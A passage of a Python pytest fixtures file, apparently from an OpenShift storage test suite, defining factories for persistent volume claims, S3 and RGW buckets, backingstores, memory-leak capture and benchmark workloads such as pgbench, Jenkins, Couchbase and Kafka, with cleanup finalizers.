if access_modes_selection == "select_random":
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = dist_val + (num_of_pvc % num_of_modes)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == "distribute_random":
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if "-" in access_mode:
access_mode, volume_mode = access_mode.split("-")
else:
volume_mode = ""
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode,
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status, timeout=timeout)
return pvc_list
return factory
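# Illustrative usage sketch (not part of the original fixtures): a hypothetical
# helper showing how a test could call the factory returned by multi_pvc_factory
# above. All argument values are assumptions chosen for demonstration only.
def _example_multi_pvc_factory_usage(multi_pvc_factory):
    # Create 5 CephFS PVCs: the first 2 ReadWriteOnce, the remaining 3
    # ReadWriteMany, created as sequential sets per access mode.
    return multi_pvc_factory(
        interface=constants.CEPHFILESYSTEM,
        access_modes=["ReadWriteOnce", "ReadWriteMany"],
        access_modes_selection="distribute_sequential",
        access_mode_dist_ratio=[2, 3],
        num_of_pvc=5,
        status=constants.STATUS_BOUND,
    )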
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Function to start a memory leak capture thread which will be executed in parallel with the test run.
Memory leak data will be captured on all worker nodes for the ceph-osd process.
Data will be appended to the /tmp/(worker)-top-output.txt file for each worker.
During teardown the created tmp files will be deleted.
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_function will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop memory leak data capture thread and cleanup the files
"""
set_flag_status("terminated")
try:
for status in TimeoutSampler(90, 3, get_flag_status):
if status == "terminated":
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
log_path = ocsci_log_path()
for worker in node.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
copyfile(
f"/tmp/{worker}-top-output.txt",
f"{log_path}/{worker}-top-output.txt",
)
os.remove(f"/tmp/{worker}-top-output.txt")
log.info("Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode="w+", prefix="test_status", delete=False
)
def get_flag_status():
with open(temp_file.name, "r") as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, "w") as t_file:
t_file.writelines(value)
set_flag_status("running")
def run_memory_leak_in_bg():
"""
Function to run memory leak in background thread
Memory leak data is written in below format
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(namespace=config.ENV_DATA["cluster_namespace"])
while get_flag_status() == "running":
for worker in node.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(
str(oc.exec_oc_cmd(command=top_cmd, out_yaml_format=False))
)
temp.seek(0)
for line in temp:
if "ceph-osd" in line:
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(" ")
f.write(line)
log.info("Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert (
ec2_instances
), f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING)
}
# Waiting for the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
# Iterating over the dict yields the instance IDs (the keys)
for stopping_instance in stopping_instances:
instance = aws_obj.get_ec2_instance(stopping_instance)
instance.wait_until_stopped()
stopped_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture(scope="session")
def cld_mgr(request, rgw_endpoint):
"""
Returns a cloud manager instance that'll be used throughout the session
Returns:
CloudManager: A CloudManager resource
"""
cld_mgr = CloudManager()
def finalizer():
for client in vars(cld_mgr):
try:
getattr(cld_mgr, client).secret.delete()
except AttributeError:
log.info(f"{client} secret not found")
request.addfinalizer(finalizer)
return cld_mgr
@pytest.fixture()
def rgw_obj(request):
return rgw_obj_fixture(request)
@pytest.fixture(scope="session")
def rgw_obj_session(request):
return rgw_obj_fixture(request)
def rgw_obj_fixture(request):
"""
Returns an RGW resource that represents RGW in the cluster
Returns:
RGW: An RGW resource
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
return RGW()
else:
return None
@pytest.fixture()
def rgw_deployments(request):
"""
Return RGW deployments or skip the test.
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
# Force-skipping in case of IBM Cloud -
# https://github.com/red-hat-storage/ocs-ci/issues/3863
if config.ENV_DATA["platform"].lower() == constants.IBMCLOUD_PLATFORM:
pytest.skip(
"RGW deployments were found, but test will be skipped because of BZ1926831"
)
return rgw_deployments
else:
pytest.skip("There is no RGW deployment available for this test.")
@pytest.fixture(scope="session")
def rgw_endpoint(request):
"""
Expose RGW service and return external RGW endpoint address if available.
Returns:
string: external RGW endpoint
"""
log.info("Looking for RGW service to expose")
oc = ocp.OCP(kind=constants.SERVICE, namespace=config.ENV_DATA["cluster_namespace"])
rgw_service = oc.get(selector=constants.RGW_APP_LABEL)["items"]
if rgw_service:
if config.DEPLOYMENT["external_mode"]:
rgw_service = constants.RGW_SERVICE_EXTERNAL_MODE
else:
rgw_service = constants.RGW_SERVICE_INTERNAL_MODE
log.info(f"Service {rgw_service} found and will be exposed")
# custom hostname is provided because default hostname from rgw service
# is too long and OCP rejects it
oc = ocp.OCP(
kind=constants.ROUTE, namespace=config.ENV_DATA["cluster_namespace"]
)
route = oc.get(resource_name="noobaa-mgmt")
router_hostname = route["status"]["ingress"][0]["routerCanonicalHostname"]
rgw_hostname = f"rgw.{router_hostname}"
try:
oc.exec_oc_cmd(f"expose service/{rgw_service} --hostname {rgw_hostname}")
except CommandFailed as cmdfailed:
if "AlreadyExists" in str(cmdfailed):
log.warning("RGW route already exists.")
# new route is named after service
rgw_endpoint = oc.get(resource_name=rgw_service)
endpoint_obj = OCS(**rgw_endpoint)
def _finalizer():
endpoint_obj.delete()
request.addfinalizer(_finalizer)
return f"http://{rgw_hostname}"
else:
log.info("RGW service is not available")
@pytest.fixture()
def mcg_obj(request):
return mcg_obj_fixture(request)
@pytest.fixture(scope="session")
def mcg_obj_session(request):
return mcg_obj_fixture(request)
def mcg_obj_fixture(request, *args, **kwargs):
"""
Returns an MCG resource that's connected to the S3 endpoint
Returns:
MCG: An MCG resource
"""
if config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM:
log.warning("As openshift dedicated is used, no MCG resource is returned")
return None
mcg_obj = MCG(*args, **kwargs)
def finalizer():
if config.ENV_DATA["platform"].lower() == "aws":
mcg_obj.cred_req_obj.delete()
if kwargs.get("create_aws_creds"):
request.addfinalizer(finalizer)
return mcg_obj
@pytest.fixture()
def awscli_pod(request):
return awscli_pod_fixture(request, scope_name="function")
@pytest.fixture(scope="session")
def awscli_pod_session(request):
return awscli_pod_fixture(request, scope_name="session")
def awscli_pod_fixture(request, scope_name):
"""
Creates a new AWSCLI pod for relaying commands
Args:
scope_name (str): The name of the fixture's scope,
used for giving a descriptive name to the pod and configmap
Returns:
pod: A pod running the AWS CLI
"""
# Create the service-ca configmap to be mounted upon pod creation
service_ca_data = templating.load_yaml(constants.AWSCLI_SERVICE_CA_YAML)
service_ca_configmap_name = create_unique_resource_name(
constants.AWSCLI_SERVICE_CA_CONFIGMAP_NAME, scope_name
)
service_ca_data["metadata"]["name"] = service_ca_configmap_name
log.info("Trying to create the AWS CLI service CA")
service_ca_configmap = helpers.create_resource(**service_ca_data)
arch = get_system_architecture()
if arch.startswith("x86"):
pod_dict_path = constants.AWSCLI_POD_YAML
else:
pod_dict_path = constants.AWSCLI_MULTIARCH_POD_YAML
awscli_pod_dict = templating.load_yaml(pod_dict_path)
awscli_pod_dict["spec"]["volumes"][0]["configMap"][
"name"
] = service_ca_configmap_name
awscli_pod_name = create_unique_resource_name(
constants.AWSCLI_RELAY_POD_NAME, scope_name
)
awscli_pod_dict["metadata"]["name"] = awscli_pod_name
update_container_with_mirrored_image(awscli_pod_dict)
awscli_pod_obj = Pod(**awscli_pod_dict)
assert awscli_pod_obj.create(
do_reload=True
), f"Failed to create Pod {awscli_pod_name}"
OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE, kind="ConfigMap").wait_for_resource(
resource_name=service_ca_configmap.name, column="DATA", condition="1"
)
helpers.wait_for_resource_state(awscli_pod_obj, constants.STATUS_RUNNING)
def _awscli_pod_cleanup():
awscli_pod_obj.delete()
service_ca_configmap.delete()
request.addfinalizer(_awscli_pod_cleanup)
return awscli_pod_obj
@pytest.fixture()
def test_directory_setup(request, awscli_pod_session):
return test_directory_setup_fixture(request, awscli_pod_session)
def test_directory_setup_fixture(request, awscli_pod_session):
origin_dir, result_dir = setup_pod_directories(
awscli_pod_session, ["origin", "result"]
)
SetupDirs = namedtuple("SetupDirs", "origin_dir, result_dir")
def dir_cleanup():
test_name = get_current_test_name()
awscli_pod_session.exec_cmd_on_pod(command=f"rm -rf {test_name}")
request.addfinalizer(dir_cleanup)
return SetupDirs(origin_dir=origin_dir, result_dir=result_dir)
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
@pytest.fixture()
def uploaded_objects(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
return uploaded_objects_fixture(
request, mcg_obj, awscli_pod, verify_rgw_restart_count
)
@pytest.fixture(scope="session")
def uploaded_objects_session(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
):
return uploaded_objects_fixture(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
)
def uploaded_objects_fixture(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
"""
Tracks the objects uploaded during the test and deletes them during teardown
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
awscli_pod (Pod): A pod running the AWSCLI tools
Returns:
list: An initially empty list; tests append uploaded object paths to it
"""
uploaded_objects_paths = []
def object_cleanup():
for uploaded_filename in uploaded_objects_paths:
log.info(f"Deleting object {uploaded_filename}")
awscli_pod.exec_cmd_on_pod(
command=craft_s3_command("rm " + uploaded_filename, mcg_obj),
secrets=[
mcg_obj.access_key_id,
mcg_obj.access_key,
mcg_obj.s3_internal_endpoint,
],
)
request.addfinalizer(object_cleanup)
return uploaded_objects_paths
@pytest.fixture()
def verify_rgw_restart_count(request):
return verify_rgw_restart_count_fixture(request)
@pytest.fixture(scope="session")
def verify_rgw_restart_count_session(request):
return verify_rgw_restart_count_fixture(request)
def verify_rgw_restart_count_fixture(request):
"""
Verifies the RGW restart count at start and end of a test
"""
if config.ENV_DATA["platform"].lower() in constants.ON_PREM_PLATFORMS:
log.info("Getting RGW pod restart count before executing the test")
initial_counts = get_rgw_restart_counts()
def finalizer():
rgw_pods = get_rgw_pods()
for rgw_pod in rgw_pods:
rgw_pod.reload()
log.info("Verifying whether RGW pods changed after executing the test")
for rgw_pod in rgw_pods:
assert rgw_pod.restart_count in initial_counts, "RGW pod restarted"
request.addfinalizer(finalizer)
@pytest.fixture()
def rgw_bucket_factory(request, rgw_obj):
if rgw_obj:
return bucket_factory_fixture(request, rgw_obj=rgw_obj)
else:
return None
@pytest.fixture(scope="session")
def rgw_bucket_factory_session(request, rgw_obj_session):
if rgw_obj_session:
return bucket_factory_fixture(request, rgw_obj=rgw_obj_session)
else:
return None
@pytest.fixture()
def bucket_factory(request, bucket_class_factory, mcg_obj):
"""
Returns an MCG bucket factory.
If MCG object not found returns None
"""
if mcg_obj:
return bucket_factory_fixture(request, bucket_class_factory, mcg_obj)
else:
return None
@pytest.fixture(scope="session")
def bucket_factory_session(request, bucket_class_factory_session, mcg_obj_session):
"""
Returns a session-scoped MCG bucket factory.
If session-scoped MCG object not found returns None
"""
if mcg_obj_session:
return bucket_factory_fixture(
request, bucket_class_factory_session, mcg_obj_session
)
else:
return None
def bucket_factory_fixture(
request, bucket_class_factory=None, mcg_obj=None, rgw_obj=None
):
"""
Create a bucket factory. Calling this fixture creates a new bucket(s).
For a custom amount, provide the 'amount' parameter.
***Please note***
Creation of buckets by utilizing the S3 interface *does not* support bucketclasses.
Only OC/CLI buckets can support different bucketclasses.
By default, all S3 buckets utilize the default bucketclass.
Args:
bucket_class_factory: creates a new Bucket Class
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
rgw_obj (RGW): An RGW object
"""
created_buckets = []
def _create_buckets(
amount=1,
interface="S3",
verify_health=True,
bucketclass=None,
replication_policy=None,
*args,
**kwargs,
):
"""
Creates the requested amount of buckets; all created buckets are deleted during teardown
Args:
amount (int): The amount of buckets to create
interface (str): The interface to use for creation of buckets.
S3 | OC | CLI | NAMESPACE
verify_health (bool): Whether to verify the created bucket's health
post-creation
bucketclass (dict): A dictionary describing a new
bucketclass to be created.
When None, the default bucketclass is used.
Returns:
list: A list of s3.Bucket objects, containing all the created
buckets
"""
if bucketclass:
interface = bucketclass["interface"]
current_call_created_buckets = []
if interface.lower() not in BUCKET_MAP:
raise RuntimeError(
f"Invalid interface type received: {interface}. "
f'available types: {", ".join(BUCKET_MAP.keys())}'
)
bucketclass = (
bucketclass if bucketclass is None else bucket_class_factory(bucketclass)
)
for _ in range(amount):
bucket_name = helpers.create_unique_resource_name(
resource_description="bucket", resource_type=interface.lower()
)
created_bucket = BUCKET_MAP[interface.lower()](
bucket_name,
mcg=mcg_obj,
rgw=rgw_obj,
bucketclass=bucketclass,
replication_policy=replication_policy,
*args,
**kwargs,
)
current_call_created_buckets.append(created_bucket)
created_buckets.append(created_bucket)
if verify_health:
created_bucket.verify_health()
return current_call_created_buckets
def bucket_cleanup():
for bucket in created_buckets:
log.info(f"Cleaning up bucket {bucket.name}")
try:
bucket.delete()
except ClientError as e:
if e.response["Error"]["Code"] == "NoSuchBucket":
log.warning(f"{bucket.name} could not be found in cleanup")
else:
raise
request.addfinalizer(bucket_cleanup)
return _create_buckets
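# Illustrative usage sketch (hypothetical, not part of the original fixtures):
# creating OC buckets backed by a custom bucketclass through the factory
# returned by bucket_factory_fixture above. The bucketclass dictionary values
# are assumptions for demonstration only.
def _example_bucket_factory_usage(bucket_factory):
    bucketclass = {
        "interface": "OC",
        "backingstore_dict": {"aws": [(1, "us-east-2")]},
    }
    # Create two OC buckets that use the custom bucketclass
    return bucket_factory(amount=2, interface="OC", bucketclass=bucketclass)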
@pytest.fixture(scope="class")
def cloud_uls_factory(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="session")
def cloud_uls_factory_session(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="function")
def mcg_job_factory(request, bucket_factory, project_factory, mcg_obj, tmp_path):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request, bucket_factory, project_factory, mcg_obj, tmp_path
)
@pytest.fixture(scope="session")
def mcg_job_factory_session(
request, bucket_factory_session, project_factory_session, mcg_obj_session, tmp_path
):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request,
bucket_factory_session,
project_factory_session,
mcg_obj_session,
tmp_path,
)
@pytest.fixture()
def backingstore_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If MCG object not found
"""
if mcg_obj:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
else:
return None
@pytest.fixture(scope="session")
def backingstore_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
else:
return None
@pytest.fixture()
def bucket_class_factory(
request, mcg_obj, backingstore_factory, namespace_store_factory
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If MCG object not found
"""
if mcg_obj:
return bucketclass_factory_implementation(
request, mcg_obj, backingstore_factory, namespace_store_factory
)
else:
return None
@pytest.fixture(scope="session")
def bucket_class_factory_session(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return bucketclass_factory_implementation(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
)
else:
return None
@pytest.fixture()
def multiregion_mirror_setup(bucket_factory):
return multiregion_mirror_setup_fixture(bucket_factory)
@pytest.fixture(scope="session")
def multiregion_mirror_setup_session(bucket_factory_session):
return multiregion_mirror_setup_fixture(bucket_factory_session)
def multiregion_mirror_setup_fixture(bucket_factory):
# Setup
# Todo:
# add region and amount parametrization - note that `us-east-1`
# will cause an error as it is the default region. If usage of `us-east-1`
# needs to be tested, keep the 'region' field out.
bucketclass = {
"interface": "CLI",
"backingstore_dict": {"aws": [(1, "us-west-1"), (1, "us-east-2")]},
"placement_policy": "Mirror",
}
# Create a NooBucket that'll use the bucket class in order to test
# the mirroring policy
bucket = bucket_factory(1, "OC", bucketclass=bucketclass)[0]
return bucket, bucket.bucketclass.backingstores
@pytest.fixture(scope="session")
def default_storageclasses(request, teardown_factory_session):
"""
Returns dictionary with storageclasses. Keys represent reclaim policy of
storageclass. There are two storageclasses for each key. First is RBD based
and the second one is CephFS based. Storageclasses with Retain Reclaim
Policy are created from default storageclasses.
"""
scs = {constants.RECLAIM_POLICY_DELETE: [], constants.RECLAIM_POLICY_RETAIN: []}
# TODO(fbalak): Use proper constants after
# https://github.com/red-hat-storage/ocs-ci/issues/1056
# is resolved
for sc_name in ("ocs-storagecluster-ceph-rbd", "ocs-storagecluster-cephfs"):
sc = OCS(kind=constants.STORAGECLASS, metadata={"name": sc_name})
sc.reload()
scs[constants.RECLAIM_POLICY_DELETE].append(sc)
sc.data["reclaimPolicy"] = constants.RECLAIM_POLICY_RETAIN
sc.data["metadata"]["name"] += "-retain"
sc._name = sc.data["metadata"]["name"]
sc.create()
teardown_factory_session(sc)
scs[constants.RECLAIM_POLICY_RETAIN].append(sc)
return scs
@pytest.fixture(scope="class")
def install_logging(request):
"""
Setup and teardown
* The setup will deploy openshift-logging in the cluster
* The teardown will uninstall cluster-logging from the cluster
"""
def finalizer():
uninstall_cluster_logging()
request.addfinalizer(finalizer)
csv = ocp.OCP(
kind=constants.CLUSTER_SERVICE_VERSION,
namespace=constants.OPENSHIFT_LOGGING_NAMESPACE,
)
logging_csv = csv.get().get("items")
if logging_csv:
log.info("Logging is already configured, Skipping Installation")
return
log.info("Configuring Openshift-logging")
# Checks OCP version
ocp_version = get_running_ocp_version()
logging_channel = "stable" if ocp_version >= "4.7" else ocp_version
# Creates namespace openshift-operators-redhat
ocp_logging_obj.create_namespace(yaml_file=constants.EO_NAMESPACE_YAML)
# Creates an operator-group for elasticsearch
assert ocp_logging_obj.create_elasticsearch_operator_group(
yaml_file=constants.EO_OG_YAML, resource_name="openshift-operators-redhat"
)
# Set RBAC policy on the project
assert ocp_logging_obj.set_rbac(
yaml_file=constants.EO_RBAC_YAML, resource_name="prometheus-k8s"
)
# Creates subscription for elastic-search operator
subscription_yaml = templating.load_yaml(constants.EO_SUB_YAML)
subscription_yaml["spec"]["channel"] = logging_channel
helpers.create_resource(**subscription_yaml)
assert ocp_logging_obj.get_elasticsearch_subscription()
# Creates a namespace openshift-logging
ocp_logging_obj.create_namespace(yaml_file=constants.CL_NAMESPACE_YAML)
# Creates an operator-group for cluster-logging
assert ocp_logging_obj.create_clusterlogging_operator_group(
yaml_file=constants.CL_OG_YAML
)
# Creates subscription for cluster-logging
cl_subscription = templating.load_yaml(constants.CL_SUB_YAML)
cl_subscription["spec"]["channel"] = logging_channel
helpers.create_resource(**cl_subscription)
assert ocp_logging_obj.get_clusterlogging_subscription()
# Creates instance in namespace openshift-logging
cluster_logging_operator = OCP(
kind=constants.POD, namespace=constants.OPENSHIFT_LOGGING_NAMESPACE
)
log.info(f"The cluster-logging-operator {cluster_logging_operator.get()}")
ocp_logging_obj.create_instance()
@pytest.fixture
def fio_pvc_dict():
"""
PVC template for fio workloads.
Note that all 'None' values need to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture(scope="session")
def fio_pvc_dict_session():
"""
PVC template for fio workloads.
Note that all 'None' values need to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture
def fio_configmap_dict():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture(scope="session")
def fio_configmap_dict_session():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture
def fio_job_dict():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="session")
def fio_job_dict_session():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="function")
def pgsql_factory_fixture(request):
"""
Pgsql factory fixture
"""
pgsql = Postgresql()
def factory(
replicas,
clients=None,
threads=None,
transactions=None,
scaling_factor=None,
timeout=None,
sc_name=None,
):
"""
Factory to start pgsql workload
Args:
replicas (int): Number of pgbench pods to be deployed
clients (int): Number of clients
threads (int): Number of threads
transactions (int): Number of transactions
scaling_factor (int): scaling factor
timeout (int): Time in seconds to wait
sc_name (str): Name of the storage class to use
"""
# Setup postgres
pgsql.setup_postgresql(replicas=replicas, sc_name=sc_name)
# Create pgbench benchmark
pgsql.create_pgbench_benchmark(
replicas=replicas,
clients=clients,
threads=threads,
transactions=transactions,
scaling_factor=scaling_factor,
timeout=timeout,
)
# Wait for the pgbench pod to be initialized and complete
pgsql.wait_for_pgbench_status(status=constants.STATUS_COMPLETED)
# Get pgbench pods
pgbench_pods = pgsql.get_pgbench_pods()
# Validate pgbench run and parse logs
pgsql.validate_pgbench_run(pgbench_pods)
return pgsql
def finalizer():
"""
Clean up
"""
pgsql.cleanup()
request.addfinalizer(finalizer)
return factory
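# Illustrative usage sketch (hypothetical values, not part of the original
# fixtures): starting a small pgbench workload through the factory returned by
# pgsql_factory_fixture above.
def _example_pgsql_factory_usage(pgsql_factory_fixture):
    return pgsql_factory_fixture(
        replicas=1,
        clients=4,
        threads=2,
        transactions=600,
        scaling_factor=2,
        timeout=1200,
    )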
@pytest.fixture(scope="function")
def jenkins_factory_fixture(request):
"""
Jenkins factory fixture
"""
jenkins = Jenkins()
def factory(num_projects=1, num_of_builds=1):
"""
Factory to start jenkins workload
Args:
num_projects (int): Number of Jenkins projects
num_of_builds (int): Number of builds per project
"""
# Jenkins template
jenkins.create_ocs_jenkins_template()
# Init number of projects
jenkins.number_projects = num_projects
# Create app jenkins
jenkins.create_app_jenkins()
# Create jenkins pvc
jenkins.create_jenkins_pvc()
# Create jenkins build config
jenkins.create_jenkins_build_config()
# Wait for the jenkins deploy pod to reach the Completed state
jenkins.wait_for_jenkins_deploy_status(status=constants.STATUS_COMPLETED)
# Init number of builds per project
jenkins.number_builds_per_project = num_of_builds
# Start Builds
jenkins.start_build()
# Wait for the builds to reach the 'Complete' state
jenkins.wait_for_build_to_complete()
# Print table of builds
jenkins.print_completed_builds_results()
return jenkins
def finalizer():
"""
Clean up
"""
jenkins.cleanup()
request.addfinalizer(finalizer)
return factory
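# Illustrative usage sketch (hypothetical values, not part of the original
# fixtures): starting a Jenkins workload with one project and three builds via
# the factory returned by jenkins_factory_fixture above.
def _example_jenkins_factory_usage(jenkins_factory_fixture):
    return jenkins_factory_fixture(num_projects=1, num_of_builds=3)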
@pytest.fixture(scope="function")
def couchbase_factory_fixture(request):
"""
Couchbase factory fixture
"""
couchbase = CouchBase()
def factory(
replicas=3,
run_in_bg=False,
skip_analyze=True,
sc_name=None,
num_items=None,
num_threads=None,
):
"""
Factory to start couchbase workload
Args:
replicas (int): Number of couchbase workers to be deployed
run_in_bg (bool): Whether to run IOs in the background
skip_analyze (bool): Whether to skip log analysis
sc_name (str): Name of the storage class to use
num_items (int): Number of items for the workload
num_threads (int): Number of threads for the workload
"""
# Setup couchbase
couchbase.setup_cb()
# Create couchbase workers
couchbase.create_couchbase_worker(replicas=replicas, sc_name=sc_name)
# Run couchbase workload
couchbase.run_workload(
replicas=replicas,
run_in_bg=run_in_bg,
num_items=num_items,
num_threads=num_threads,
)
# Run sanity check on data logs
couchbase.analyze_run(skip_analyze=skip_analyze)
return couchbase
def finalizer():
"""
Clean up
"""
couchbase.teardown()
request.addfinalizer(finalizer)
return factory
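# Illustrative usage sketch (hypothetical values, not part of the original
# fixtures): starting a Couchbase workload via the factory returned by
# couchbase_factory_fixture above.
def _example_couchbase_factory_usage(couchbase_factory_fixture):
    return couchbase_factory_fixture(replicas=3, run_in_bg=False, skip_analyze=True)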
@pytest.fixture(scope="function")
def amq_factory_fixture(request):
"""
AMQ factory fixture
"""
amq = AMQ()
def factory(
sc_name,
kafka_namespace=constants.AMQ_NAMESPACE,
size=100,
replicas=3,
topic_name="my-topic",
user_name="my-user",
partitions=1,
topic_replicas=1,
num_of_producer_pods=1,
num_of_consumer_pods=1,
value="10000",
since_time=1800,
):
"""
Factory to start amq workload
Args:
sc_name (str): Name of the storage class
kafka_namespace (str): Namespace where kafka cluster to be created
size (int): Size of the storage
replicas (int): Number of kafka and zookeeper pods to be created
topic_name (str): Name of the topic to be created
user_name (str): Name of the user to be created
partitions (int): Number of partitions of topic
topic_replicas (int): Number of replicas of topic
num_of_producer_pods (int): Number of producer pods to be created
num_of_consumer_pods (int): Number of consumer pods to be created
value (str): Number of messages to be sent and received
since_time (int): Time window in seconds used when checking for sent and received messages
"""
# Setup kafka cluster
amq.setup_amq_cluster(
sc_name=sc_name, namespace=kafka_namespace, size=size, replicas=replicas
)
# Run open messages
amq.create_messaging_on_amq(
topic_name=topic_name,
user_name=user_name,
partitions=partitions,
replicas=topic_replicas,
num_of_producer_pods=num_of_producer_pods,
num_of_consumer_pods=num_of_consumer_pods,
value=value,
)
# Wait for some time to generate msg
waiting_time = 60
log.info(f"Waiting for {waiting_time}sec to generate msg")
time.sleep(waiting_time)
# Check messages are sent and received
threads = amq.run_in_bg(
namespace=kafka_namespace, value=value, since_time=since_time
)
return amq, threads
def finalizer():
"""
Clean up
"""
# Clean up
amq.cleanup()
request.addfinalizer(finalizer)
return factory
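# Illustrative usage sketch (hypothetical values, not part of the original
# fixtures): starting an AMQ/Kafka workload via the factory returned by
# amq_factory_fixture above. The storage class name is an assumption for
# demonstration only.
def _example_amq_factory_usage(amq_factory_fixture):
    amq, threads = amq_factory_fixture(
        sc_name="ocs-storagecluster-ceph-rbd",
        size=100,
        replicas=3,
        num_of_producer_pods=1,
        num_of_consumer_pods=1,
    )
    return amq, threads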
@pytest.fixture
def measurement_dir(tmp_path):
"""
Returns the directory path where all measurement-related results should be
stored. If 'measurement_dir' is provided by the config then it is used,
otherwise a new directory is generated.
Returns:
str: Path to measurement directory
"""
if config.ENV_DATA.get("measurement_dir"):
measurement_dir = config.ENV_DATA.get("measurement_dir")
log.info(f"Using measurement dir from configuration: {measurement_dir}")
else:
measurement_dir = os.path.join(os.path.dirname(tmp_path), "measurement_results")
if not os.path.exists(measurement_dir):
